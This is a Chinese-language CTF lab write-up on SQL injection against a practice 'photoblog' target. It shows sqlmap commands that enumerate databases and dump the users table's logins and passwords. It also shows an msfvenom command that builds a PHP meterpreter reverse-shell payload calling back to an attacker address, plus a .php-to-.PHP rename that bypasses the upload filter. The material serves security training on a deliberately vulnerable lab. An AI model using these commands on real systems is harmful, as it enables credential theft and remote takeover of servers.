CTF-web安全sql注入

it2024-06-25  45

web安全sql注入

sql注入介绍

信息探测

这里的基本操作与之前的没有什么出入,

深入挖掘

深入挖掘,之后我们发现了一个敏感的网址/admin/login.php 打开之后,我们发现了一个类似的登录界面,这个时候,我们尝试使用弱口令,发现无法登陆,那我们就要去找用户名和密码了:

漏洞扫描

使用owasp-zap这个非常好用的漏洞扫描器: 打开owasp-zap: 对靶场进行攻击: 进行自动扫描,之后我们分析扫描结果: 我们发现了一个高危漏洞:sql注入

漏洞利用

接下来我们就要利用这个sql注入漏洞进行攻击:

http://192.168.56.107/cat.php?id=3-2 sqlmap -u "http://192.168.56.107/cat.php?id=3" sqlmap -u "http://192.168.56.107/cat.php?id=3" --dbs sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" --tables sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" -T "users" --colunns sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump 1234567891011

我们把扫描结果的URL进行复制: 登陆之后我们发现了类似界面,这样我们可以以后利用这个页面 接下来我们开始准备获取用户名以及密码: 查看可能利用的错误输入造成sql注入: 查看所存在的数据库: 查看photoblog数据库中的表: 接下来准备进行密码破解: 我们得到了用户名以密码。 使用得到的用户名以及密码之后我们登陆成功了!!!

上传shell反弹权限

生成一个webshell:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.104 lport=4444 -f raw 1

保存webshell到桌面上: 设置对应的参数 之后我们上传对应webshell.php(注意这里可能对.php有过滤机制,这个时候我们可以使用.PHP来绕过过滤机制) .php->.PHP 上传完对应的文件,之后记得点击对应的文件使其执行,我们才可以反弹回对应的权限。 这个时候就会反弹回对应的权限: 我们拿下了靶场,这个靶场设置的没有flag,就是为了学会sql注入而设计的。 ok!!!

最新回复(0)